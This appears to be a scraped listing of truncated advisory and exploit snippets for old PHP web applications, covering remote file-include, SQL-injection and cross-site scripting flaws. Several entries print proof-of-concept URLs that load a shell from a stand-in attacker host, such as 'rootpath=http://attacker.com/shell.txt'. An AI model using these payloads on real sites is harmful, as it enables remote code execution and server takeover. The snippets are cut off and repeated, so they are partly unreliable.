Invision Power Board Local File Include and SQL Injection Vulnerabilities

Invision Power Board is prone to a local file-include vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyrigh...

SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit

No description provided by source. SiSplet CMS = 2008-01-24 Multiple Remote File Include Exploit 3rr0r 1: ./SiSplet-2008-01-24/main/anketa/new.php line 3 ?php requireonce$sitepath.'main/anketa/class.php'; ? 3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php line 3 ?php...

SiSplet CMS <= 2008-01-24 Multiple Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================== SiSplet CMS 3rr0r 2: ./SiSplet-2008-01-24/main/forum/komentar.php line 3 PoC : http://target/path/main/anketa/new.php?sitepath=Shell...

AROUNDMe <= 1.1 (language_path) Remote File Include Exploit

Exploit for unknown platform in category web applications =========================================================== AROUNDMe PoC : http://server/path/components/core/connect.php?languagepath=Shell 0day.today 2018-01-09...

AROUNDMe &lt;= 1.1 (language_path) Remote File Include Exploit

No description provided by source. Discovered by cr4wl3r \ Indonesian Hacker 3rr0r: ./aroundme11/aroundme/components/core/connect.php line 25 ?php includeonce$languagepath . 'connect.lang.php'; ? PoC : http://server/path/components/core/connect.php?languagepath=Shell Contact Me :...

Invision Power Board Local File Include Vulnerabilities

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. Information harvested may aid in further attacks. Invision Power Services Invision Power Board 2.3.6 Invision Power...

Thatware &lt;= 0.5.3 Multiple Remote File Include Exploit

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Thatware = 0.5.3 Multiple Remote File Include Exploit Download Script : http://sourceforge.net/projects/thatware/files Vuln : ./thatwarepath/config.php line 4 ?php include $rootpath."dbsettings.php"; ? PoC :...

SAPID SHOP <= 1.3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications =================================================== SAPID SHOP PoC : http://server/path/usr/extensions/gettree.inc.php?rootpath=http://attacker.com/shell.txt??? Vuln : ./SAPID-SHOP-1.3/usr/extensions/gettree.inc.php line 11 PoC :...

SAPID SHOP &lt;= 1.3 Remote File Include Vulnerability

No description provided by source. Download Script : http://sourceforge.net/projects/sapid/files Vuln : ./SAPID-SHOP-1.3/usr/extensions/gettree.inc.php line 11 ?php require $formsdir."calmenuform.php"; if!defined"commonextfunctions" define"commonextfunctions", "loaded";...

AdaptCMS Lite Cross Site Scripting and Remote File Include Vulnerabilities

AdaptCMS Lite is prone to multiple cross-site scripting vulnerabilities and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to execute malicious PHP code in the context of the webserver process. This may allow...

Joomla Component MojoBlog Multiple Remote File Include vulnerability

No description provided by source. Joomla Component MojoBlog Multiple Remote File Include vulnerability Author : kaMtiEz [email protected] Homepage : http://www.indonesiancoder.com Date : November 20, 2009 Software Information + Vendor : http://www.joomlify.com/ + Download :...

AdaptCMS Lite Cross Site Scripting and Remote File Include Vulnerabilities

AdaptCMS Lite is prone to multiple cross-site scripting vulnerabilities and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are...

Public Media Manager <= 1.3 (forms_dir) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================================= Public Media Manager PoC : http://server/path/comcal/calmenu.php?formsdir=http://attacker.com/shell.txt?cmd 0day.today 2018-04-05...

Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities

No description provided by source. Joomla Component MojoBlog Multiple Remote File Include vulnerability Author : kaMtiEz [email protected] Homepage : http://www.indonesiancoder.com Date : November 20, 2009 Software Information + Vendor : http://www.joomlify.com/ + Download :...

Public Media Manager &lt;= 1.3 (forms_dir) Remote File Include Vulnerability

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Public Media Manager = 1.3 formsdir Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/pmm-cms/files/ Dork : die"Lamers attempt"; :D Vuln : ./pmm-cms-1.3/comcal/calmenu.php line 4...

Joomla MojoBlog Component v0.15 Multiple Remote File Include

Exploit for unknown platform in category web applications ============================================================================ Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities ============================================================================ Software...

CVE-2009-4088

Multiple directory traversal vulnerabilities in telepark.wiki 2.4.23 and earlier allow remote attackers to read arbitrary files via directory traversal sequences in the css parameter to 1 getjs.php and 2 getcsslocal.php; and include and execute arbitrary local files via the 3 group parameter to...

Sugar CRM 5.5.0.rc25.2.0j - Multiple Vulnerabilities

Sugar CRM 5.5.0.rc25.2.0j - Multiple Vulnerabilities Author: Janek Vind 'waraxe' Vulnerable: SugarCRM SugarCRM 5.5.0.RC2 SugarCRM SugarCRM 5.2.0j Product: http://www.sugarcrm.com/crm/ Description: SugarCRM is prone to multiple remote vulnerabilities, including: 1. Multiple SQL-injection...

Sugar CRM 5.5.0.RC2 and 5.2.0j Multiple Remote Vulnerabilities

No description provided by source. Author: Janek Vind 'waraxe' Vulnerable: SugarCRM SugarCRM 5.5.0.RC2 SugarCRM SugarCRM 5.2.0j Product: http://www.sugarcrm.com/crm/ Description: SugarCRM is prone to multiple remote vulnerabilities, including: 1. Multiple SQL-injection vulnerabilities 2. Multiple...

SweetRice <= 0.5.3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================== SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 0day.today 2018-03-28...